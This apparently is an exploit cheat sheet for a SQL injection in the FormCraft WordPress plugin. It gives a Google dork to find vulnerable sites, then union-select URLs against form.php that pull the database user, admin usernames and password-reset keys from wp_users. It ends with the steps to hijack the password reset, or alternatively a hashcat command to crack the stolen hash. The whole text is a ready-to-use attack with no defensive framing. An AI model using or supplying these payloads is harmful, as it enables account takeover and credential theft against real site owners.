dork=inurl:/wp-content/plugins/formcraft
========================================
http://victim.com/wp-content/plugins/formcraft/form.php?id=1 union select 1,2,3,4,5,6,7,8,9,10,11
http://victim.com/wp-content/plugins/formcraft/form.php?id=1 union select 1,2,3,user(),5,6,7,8,9,10,11
http://victim.com/wp-content/plugins/formcraft/form.php?id=1 union select 1,2,3,group_concat(user_login),5,6,7,8,9,10,11 from wp_users where id=1
========================================
http://victim.com/wp-login.php?action=lostpassword
must use $user_login
========================================
http://victim.com/wp-content/plugins/formcraft/form.php?id=1 union select 1,2,3,group_concat(user_activation_key),5,6,7,8,9,10,11 from wp_users where id=1
========================================
http://victim.com/wp-login.php?action=rp&key=$user_activation_key&login=$user_login
must use $user_activation_key and $user_login or just get the password and use hashcat and crack it
C:\hashcat>hashcat-cli64.exe -a 3 --pw-min=20 --pw-max=20 -m 400 -n 2 -c 64 hash2crack.txt -1 ?l?u?d ?l?l?l?l?l?l?l?l?l?l?l?l?l?l?l?l?l?l?l?l